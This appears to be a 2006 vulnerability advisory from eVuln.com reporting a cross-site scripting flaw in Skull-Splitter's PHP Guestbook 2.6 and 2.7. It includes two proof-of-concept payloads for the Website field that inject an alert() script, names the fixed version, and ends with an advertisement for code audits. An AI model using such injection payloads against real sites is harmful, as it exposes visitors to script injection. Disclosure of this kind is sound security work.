XSS Vulnerability in Skull-Splitter PHP Guestbook
- XSS Vulnerability in Skull-Splitter PHP Guestbook
- Last Update
- 2006.03.27 Exploitation code published
- Risk Level
- Cross Site Scripting
- Vulnerable Software
- Skull-Splitter's PHP Guestbook (http://www.boysen.be/)
- 2.6 2.7
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Cross Site Scripting found in Skull-Splitter's PHP Guestbook (http://www.boysen.be/) script.Vulnerable Script: guestbook.php
Condition: magic_quotes_gpc = off
PoC/ExploitCross-Site Scripting Example:
Website: aaa"><script>alert("Vulnerable")</script><aaa a="
Website: http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com
Solution.To fix this problem install or upgrade to 2.75 version provided by vendor.
Order Source Code Analysis
Prevent attacks by source code analysis of your website made by our team.The work will be done by experts in web security.